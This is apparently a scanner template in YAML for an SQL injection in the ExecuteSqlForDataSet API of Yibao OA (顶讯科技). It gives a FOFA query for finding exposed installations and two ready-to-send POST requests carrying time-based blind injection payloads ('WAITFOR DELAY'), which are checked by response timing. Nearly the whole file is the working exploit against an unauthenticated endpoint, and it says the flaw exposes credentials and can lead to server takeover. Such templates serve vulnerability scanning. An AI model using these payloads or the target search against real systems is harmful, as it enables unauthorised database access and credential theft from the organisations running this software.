product: 顶讯科技-易宝OA系统
vName: 易宝OA ExecuteSqlForDataSet存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 易宝OA ExecuteSqlForDataSet接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="顶讯科技-易宝OA系统"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /api/system/ExecuteSqlForDataSet
      data: token=zxh&sql=;WAITFOR DELAY '0:0:5'--&strParameters
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: post
      follow: false
      path: /api/system/ExecuteSqlForDataSet
      data: token=zxh&sql=;WAITFOR DELAY '0:0:0'--&strParameters
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3